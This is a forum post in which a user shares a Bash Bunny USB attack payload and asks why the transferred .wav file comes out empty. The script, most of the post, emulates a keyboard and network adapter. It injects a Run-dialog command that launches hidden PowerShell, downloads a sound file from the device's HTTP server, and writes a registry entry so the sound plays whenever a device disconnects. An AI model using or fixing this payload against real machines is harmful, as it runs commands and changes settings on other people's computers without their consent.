Shanegal Posted September 24, 2019 Posted September 24, 2019 hey guys, so I had some trouble with the screaming payload of doom payload so ive adapted the wallpaper changer payload to do basically the same thing but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? can anyone help me with this please? Here is the script ive have made and ive attached the full payload at the bottom LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET HOST_IP GET SWITCH_POSITION udisk mount cd /root/udisk/payloads/$SWITCH_POSITION python -m SimpleHTTPServer 80 & LED ATTACK Q GUI r Q DELAY 500 Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" Q ENTER LED G SUCCESS s.wav screamer payload.txt
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